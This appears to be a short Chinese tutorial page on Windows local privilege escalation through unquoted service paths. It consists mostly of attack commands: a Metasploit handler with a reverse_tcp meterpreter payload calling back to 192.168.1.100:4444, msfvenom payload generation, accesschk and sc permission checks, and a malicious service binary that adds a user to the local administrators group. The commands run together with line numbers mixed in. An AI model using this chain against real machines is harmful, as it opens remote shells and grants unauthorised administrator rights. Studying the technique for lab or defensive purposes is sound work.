未打引号的路径&windows本地提权 我录制了一个演示视频 meterpreter开启监听123456789msfconsolehandler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exesearch trusted_serviceuse 0set session 1run 查看服务权限12345C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc unquotedsvcC:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv user *sc qc unquotedsvc 生成伪造的服务1234msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exesc start unquotedsvcnet localgroup administrators windows windows windows服务之注册表提权 Previous windows-cmd用户管理命令 Next